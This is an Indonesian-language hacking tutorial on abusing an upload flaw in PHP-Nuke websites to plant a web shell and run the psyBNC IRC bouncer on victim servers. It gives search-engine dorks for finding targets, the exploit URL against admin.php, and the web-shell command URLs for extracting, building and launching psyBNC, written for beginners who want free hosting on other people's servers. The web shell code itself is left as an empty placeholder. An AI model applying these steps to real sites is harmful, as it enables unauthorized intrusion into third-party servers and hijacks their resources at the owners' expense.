Menginstal psyBNC di URL? why not? pasti ada cara kok sebenarnya cara ini tergolong lama banget dan mungkin sudah banyak yang tahu ttg hal ini, yaitu memanfaatkan kelemahan web site yg memakai PHP Nuke, mau tahu cara lengkapnya? pelototin ajah artikel ini, salam dari kami -CEO- --------------------------------------------------------------------------------- Untuk kali ini saya akan menulis sedikit 'ilmu lama' saya tentang instalasi psyBNC lewat web site yang berbasis PHP Nuke. Sebelum mengenal PHP Shell Mungkin sudah menjadi cerita lama, dan kebetulan ilmu ini saya ambil dari seorang teman dekat saya Go`Zilla #makassarhack yang mana pada waktu itu untuk mendapatkan shell sangatlah susah (pengecualian buat shell hasil carder) dan untuk membuat nick kita online 24 jam pun harus sewa psyBNC user Rp.30.000 per bulan waktu itu mahal khan! nah sekarang ada alternativ lain yang asik untuk kita pelajari yakni instalasi psyBNC lewat URL, disamping gratis dan juga asik dalam pemburuan target yang vuln :) Pertama yang perlu kita persiapkan: 1. rokok (ini wajib) 2. psyBNC.tar.gz (dapat diambil di http://www.psychoid.lam3rz.de/) 3. sedikit keterampilan dan kejelian mata 4. target.php (akan dijelaskan di dalam isi artikel) Sekarang langkah yang pertama untuk pencarian target melalui search engine dengan cara masukkan kata (.com/stats.php atau .com/admin.php) atau mungkin kalian mempunyai trik tersendiri untuk pencarian target yang lebih jitu. Setelah terget terkumpul maka yang akan kita lakukan adalah men-scan target tersebut apakah masih bisa di upload psyBNC atau sudah di patch, saya tidak akan memberi tahukan bagaimana target yang sudah dipatch dan mana yang belum, saya anggap kalian sudah paham, caranya: - http://www.target.com/admin.php?upload=1%%20&file=config.php&file_name=scut.txt&wdir= /cache/&userfile=config.php%20&userfile_name=scut.txt - Setelah target tersebut ternyata masih bisa dan belum di patch yang perlu kita lakukan adalah membuat target.php dan meng-upload bersama dengan psyBNC.tar.gz, caranya: ----------------- copy here ----------------- ----------------- selesai ------------------- Command tersebut anda buat di notepad dan rename menjadi target.php melalui DOS agar tidak menjadi (target.php.txt) ini berlaku jika anda rename langsung dari notepad maka hasilnya akan menjadi seperti itu, (tetap dalam bentuk .txt) Setelah selesai anda up-load ke target bersama dengan psyBNC.tar.gz anda yang sudah dipersiapkan nah setelah itu ketik command: - http://www.target.com/cache/target.php?cmd=id kemudian ketik command untuk extract psyBNC - http://www.target.com/cache/target.php?cmd=tar -zxvf psyBNC2.2.2.tar.gz - Nah setelah psyBNC kita extract kita sekarang menuju ke folder psybnc dengan cara: - http://www.target.com/admin.php?upload=1%20&file=config.php&file_name=scut.txt&wdir= /cache/psybnc/&userfile=config.php%20&userfile_name=scut.txt - Sebelum anda lakukan instalasi psyBNC anda upload kembali target.php anda di folder ini untuk menjalankan coommand berikutnya, setelah ter-upload ketik command untuk menginstal: - http://www.target.com/cache/psybnc/target.php?cmd=make - http://www.target.com/cache/psybnc/target.php?cmd=./psybnc psybnc.conf - Nah jadi khan psyBNC gratis dan hemat :) dan bila di target anda sudah ada yang 'menyentuh' terlebih dahulu jangan panik, yang kita butuhkan hanyalah meng-upload file psybnc.conf baru ke folder psybnc dengan port yang berbeda dan yang pelu kita lakukan hanyalah upload file psybnc.conf baru dengan nama yang berbeda (misal baru.conf) dengan port yang berbeda juga dan setelah itu kita hanya perlu mengetik command: - http://www.target.com/cache/psybnc/target.php?cmd=make - http://www.target.com/cache/psybnc/target.php?cmd=./psybnc baru.conf - Just simpel bukan? dan saya kira artikel ini mudah banget kok untuk dipahami bagi pemula dengan sedikit konsentrasi dan kesabaran, pasti kalian semua dapat kok.